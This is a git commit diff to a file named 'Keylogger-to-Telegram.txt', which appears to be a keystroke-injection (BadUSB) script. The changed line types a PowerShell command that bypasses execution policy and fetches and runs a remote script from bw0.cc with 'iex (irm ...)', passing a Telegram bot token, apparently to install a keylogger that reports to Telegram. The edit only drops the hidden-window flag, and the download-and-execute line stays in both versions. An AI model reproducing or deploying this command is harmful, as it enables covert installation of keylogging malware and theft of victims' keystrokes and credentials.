Update Keylogger-to-Telegram.txt

This commit is contained in:
egieb
2025-06-20 11:06:04 +00:00
committed by GitHub
parent dd41abc2b8
commit 24f3d5905a

View File

@@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $tg='TOKEN_HERE'; iex (irm bw0.cc/tgkl)
STRING powershell -Ep Bypass -C $tg='TOKEN_HERE'; iex (irm bw0.cc/tgkl)
ENTER